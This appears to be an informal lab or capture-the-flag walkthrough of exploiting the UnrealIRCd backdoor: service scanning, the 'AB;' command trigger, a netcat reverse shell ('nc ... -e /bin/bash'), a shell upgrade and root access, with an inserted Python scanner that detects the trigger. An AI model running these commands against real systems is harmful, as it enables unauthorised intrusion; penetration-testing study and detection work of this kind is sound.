February 29th 2023

Target is

connecting via openvpn

openvpn oscp.vpn


nmap -sC -sV -p- -vv 


6667/tcp open  irc     syn-ack UnrealIRCd (Admin email

6697/tcp open  irc     syn-ack UnrealIRCd

8067/tcp open  irc     syn-ack UnrealIRCd (Admin email

Service Info: Host:

IRC URL no dice


searchsploit UnrealIRCd

------------------------------------------- ---------------------------------

 Exploit Title                             |  Path

------------------------------------------- ---------------------------------

UnrealIRCd - Backdoor Command Exec | linux/remote/16922.rb

UnrealIRCd - Local Configuration S | windows/dos/18011.txt

UnrealIRCd - Remote Downloader/Exe | linux/remote/

UnrealIRCd 3.x - Remote Denial of Service  | windows/dos/

------------------------------------------- ---------------------------------

Shellcodes: No Results

searchsploit -v -w linux/remote/16922.rb

[i] Unable to detect version in terms: linux/remote/16922.rb

[i] Enabling 'searchsploit --strict'

-------------------------------- --------------------------------------------

 Exploit Title                  |  URL

-------------------------------- --------------------------------------------

UnrealIRCd - Backdoor C |

So it seems I literally only need to prepend my commands with "AB;" lol


Now to test if the connection works

Checked ifconfig and I'm connected to the LAN via eth0 as

sudo tcpdump -i eth0 icmp

Now to connect to IRC

nc 6667 -vvv

While my hostname is being resolved I'll pass in a command here

AB;ping -c 1

The ping went through. Seems that even though the IRC failed to validate, the command still goes through
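From the defender's side, the "AB;" line used above stands out in captured traffic because it is not a valid IRC message and arrives before any NICK/USER registration. The scanner below is an added example, not part of the original notes; the sample streams, the documentation-range addresses and the names scan_stream and scan_all are constructed for illustration.

```python
import re

# Trigger prefix exactly as described in the write-up above.
BACKDOOR_PREFIX = b"AB;"
# IRC message grammar: optional ":prefix", then a verb of letters or 3 digits.
VERB_RE = re.compile(rb"^(?::\S+ +)?([A-Za-z]+|\d{3})(?: |$)")

def scan_stream(conn_id, stream):
    """Scan one reassembled client-to-server byte stream; return findings."""
    findings, seen = [], set()
    lines = [l for l in re.split(rb"\r?\n", stream) if l]
    for n, line in enumerate(lines, 1):
        # Registration is complete once both NICK and USER have been sent.
        registered = {b"NICK", b"USER"} <= seen
        m = VERB_RE.match(line)
        if line.startswith(BACKDOOR_PREFIX):
            findings.append({
                "conn": conn_id, "line": n, "rule": "backdoor-prefix",
                "pre_registration": not registered,
                "payload": line[len(BACKDOOR_PREFIX):].decode("latin-1"),
            })
        elif m is None:
            # Not a valid IRC verb: worth a look, lower confidence.
            findings.append({
                "conn": conn_id, "line": n, "rule": "malformed-verb",
                "pre_registration": not registered,
                "payload": line.decode("latin-1"),
            })
        else:
            seen.add(m.group(1).upper())
    return findings

# Constructed sample streams (documentation-range addresses, not from the page).
SAMPLES = {
    "192.0.2.50:40112": b"NICK alice\r\nUSER alice 0 * :Alice\r\nJOIN #ops\r\n",
    "192.0.2.66:51820": b"AB;ping -c 1 192.0.2.10\n",
    "192.0.2.77:33000": b"NICK bob\r\nUSER bob 0 * :Bob\r\n$$garbage\r\n"
                        b"PRIVMSG #ops :AB; is just text\r\n",
}

def scan_all(samples=SAMPLES):
    """Run the scanner over every captured stream and flatten the findings."""
    return [f for conn, s in samples.items() for f in scan_stream(conn, s)]

if __name__ == "__main__":
    for f in scan_all():
        print(f)
```

The third sample shows that "AB;" inside a normal PRIVMSG body is not flagged; only a line that begins with the prefix is.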

Netcat listener time

nc -nvlp 7777

p has to be at the end 

Now to send the reverse shell connection from the target

AB;nc 7777 -e /bin/bash

We're in 👍

Now rifling through the home directory I find local.txt

Contains the user flag 

Shell Upgrade:

python3 -c 'import pty;pty.spawn("/bin/bash")'

Privilege Escalation - Command & Control / C2

Now I want root after getting inside.

Method #1 - Guess

Actually try root

su root


Then go to root's home

cd ~

There is proof.txt

root flag obtained 🏁

Method #2 - Run tools - linpeas


On Kali: python -m SimpleHTTPServer 9999

On Server: wget